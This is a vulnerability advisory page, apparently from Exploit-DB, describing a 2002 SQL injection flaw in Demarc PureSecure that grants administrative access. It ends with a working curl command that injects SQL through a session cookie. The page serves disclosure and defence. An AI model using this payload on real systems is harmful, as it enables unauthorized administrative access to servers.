Demarc PureSecure SQL Injection Vulnerability

vendor:

PureSecure

by:

SecurityFocus

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PureSecure

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: YES

Related CWE: CVE-2002-0674

CPE: o:demarc:puresecure

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Unix, Windows NT/2000/XP

2002

Demarc PureSecure SQL Injection Vulnerability

A vulnerability has been reported in some versions of PureSecure, where user supplied input is used to construct a SQL statement, allowing SQL injection attacks. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, such as the one shown above. This can allow an attacker to gain administrative access to the server.

Mitigation:

Users should upgrade to the latest version of PureSecure.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4520/info

Demarc PureSecure is a commercially available graphical front-end for Snort, in addition to being a generalized network monitoring solution. Snort is an open-source NIDS (Network Intrusion Detection System). Demarc PureSecure will run on most Linux and Unix variants, as well as Microsoft Windows NT/2000/XP operating systems.

A vulnerability has been reported in some versions of PureSecure. User supplied input is used to construct a SQL statement, allowing SQL injection attacks. Administrative access may be gained through exploitation of this flaw.

curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<lame host>/dm/demarc